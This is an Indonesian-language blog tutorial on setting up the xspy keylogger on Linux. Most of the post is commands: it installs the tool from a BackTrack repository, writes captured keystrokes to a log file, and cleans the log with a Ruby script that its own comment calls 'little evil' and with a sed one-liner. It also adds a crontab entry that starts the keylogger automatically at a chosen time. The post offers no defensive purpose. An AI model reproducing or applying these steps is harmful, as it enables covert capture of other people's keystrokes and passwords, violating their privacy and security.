Keylogger di linux menggunakan xspy

Kebetulan browsing-browsing dan menemukan tutorial kelogger di sistem operasi linux menggunakan xspy, saya sih pernah dengar untuk xspy sendiri, akan tetapi belum ada waktu saja untuk mengexplorernya lebih dalam, sekarang kita akan mencoba untuk menggunakan xspy yang sudah include di dalam backtrack 5 R2. Kalau disitus christian yang memposting tulisan ini hanya proses menggunakannya, saya menambahkan cara menggunakan crontab agar dapat berjalan sendiri saat komputer dihidupkan.

1. Installasi xspy (bagi distro selain backtrack)

ubuntu@octopurba:~$ sudo su
ubuntu@octopurba:~# nano /etc/apt/sources.list <-- edit file source.list
deb http://archive.offensive-security.com pwnsauce main microverse macroverse restricted universe multiverse
    
ubuntu@octopurba:~# apt-get update <-- update
ubuntu@octopurba:~# aptitude search xspy <-- cek ketersedian xspy
ubuntu@octopurba:~# apt-get install xspy <-- install xspy

2. Cara menggunakan xspy

root@bt:/pentest/sniffers/xspy# touch log.txt <-- buat file log.txt
root@bt:/pentest/sniffers/xspy# ./xspy >> log.txt <-- masukan hasil dari xspy ke log.txt
root@bt:~# tail -f /pentest/sniffers/xspy/log.txt <-- untuk melihat hasil dari log.txt

3. Merubah tampilan hasil agar lebih gampang dibaca menggunakan script ruby dari blog cristhian juga yang gunanya menfilter tampilan yang muncul seperti ^A , ^C) , ^D , ^T , ^X, dll.

copy paste script dibawah memudian simmpan dengan nama filtertampilan.rb atau dengan nama yang lain(sesuai selera), jalankan dan lihat hasilnya.

#!/usr/bin/env ruby1.8
#funny and little evil i know
#have fun..
log_=Array.new
filter_=['(\([^()]*)\)|(\^A)|(\^C)|(\^D)|(\^T)|(\^X)|(\^F)|(\^S)(\^V)|(\^Z)|(\^N)|(\^U)']
letsopen_=File.open('/pentest/sniffers/xspy/log.txt','r').each do |line|
    log_.push(line.gsub(/#{filter_}/, ""))
end
puts log_

atau bisa memakai command regular expression yang menggunakan command sed

root@bt:~# sed -e 's/([^()]*)/ /g' /pentest/sniffers/xspy/log.txt

4. Membuat crontab agar xspy dapat dijalankan otomatis pada komputer dijam-jam tertentu

a. buat xspy agar gampang dieksekusi

root@bt:~# cd /pentest/sniffers/xspy/
root@bt:/pentest/sniffers/xspy# cp xspy /bin/xspy <-- copy xspy ke /bin/xspy
root@bt:/pentest/sniffers/xspy# chmod +x /bin/xspy <-- eksekusi xspy
root@bt:/pentest/sniffers/xspy# xspy 

b. Integrasi xspy dan crontab

root@bt:~# crontab -e

kemudian masukan perintah

36 20 * * * xspy >> /pentest/sniffers/xspy/log.txt

yang artinya perintah akan dieksekusi setiap jam 8:36 malam hari (rubah sesuai selera)



1. (* pertama) : menit (isian : 0 – 59)

2. (* kedua) : jam (isian : 0 – 23)

3. (* ketiga) : hari dari bulan / tanggal (isian : 1 – 31)

4. (* keempat) : bulan (isian : 1 – 12)

5. (* kelima) : hari dari minggu (isian : 0 – 6) –> 0 = minggu 

— Share It —

• Facebook
• Twitter
• Google+
• Linkedin
• Pin It

About Unknown

Hi, My Name is David Setiawan.